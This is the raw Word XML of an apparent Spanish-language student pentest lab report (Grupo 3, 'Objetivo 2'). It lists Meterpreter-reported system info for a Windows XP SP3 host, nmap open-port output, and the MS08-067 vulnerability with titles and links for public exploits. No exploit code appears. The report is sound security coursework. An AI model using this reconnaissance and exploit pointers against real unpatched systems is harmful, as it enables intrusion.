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93baergjvepc" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1968500"/>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rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo 2 - Informe</w:t>
      </w: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jc w:val="right"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grupo 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4gj6bk55b9l0" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Martin, Nicolas</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Luján, Guillermo</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Cadena, Ezequiel</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Giliberto, Nahuel</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">O’Gorman, Joaquin</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Diaz, Rodrigo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_27hz1crnifc"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pPr>
          <w:hyperlink w:anchor="_wsmdyl5a7cpu">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Resumen de resultados</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _wsmdyl5a7cpu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pPr>
          <w:hyperlink w:anchor="_rgihh4om3wc6">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ataque</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">9</w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9025.511811023624"/>
            </w:tabs>
            <w:spacing w:after="80" w:before="200" w:line="240" w:lineRule="auto"/>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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_olrn66jsar3v" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtowcqtjg3mu" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>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wsmdyl5a7cpu" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen de resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Información del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer        : WIN-XP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS              : Windows XP (5.1 Build 2600, Service Pack 3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture    : x86</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System Language : es_ES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain          : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logged On Users : 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter     : x86/windows</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Servicios expuestos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PORT     STATE SERVICE      VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">135/tcp  open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">445/tcp  open  microsoft-ds Windows XP microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5800/tcp open  vnc-http     Ultr@VNC (Name win-xp; resolution: 800x632; VNC TCP port: 5900)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|_http-title:  [win-xp] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5900/tcp open  vnc          VNC (protocol 3.6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| vnc-info: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|   Protocol version: 003.006</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|   Security types: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|_    VNC Authentication (2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidades y exploits (Punto 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2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">34477 - MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-2008-4250 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El host remoto de Windows se ve afectado por una vulnerabilidad de ejecución remota de código en el servicio 'Server' debido a un manejo inadecuado de las solicitudes RPC. Un atacante remoto no autenticado puede aprovechar esto, a través de una solicitud RPC especialmente diseñada, para ejecutar código arbitrario con 'System'.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows Server - Code Execution (MS08-067)2008-10-26      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">                                            Microsoft Windows Server - Universal Code Execution (MS08-067)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows Server - Code Execution (PoC) (MS08-067)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/cve-2008-4250</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/6824</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/6841</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/7104</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
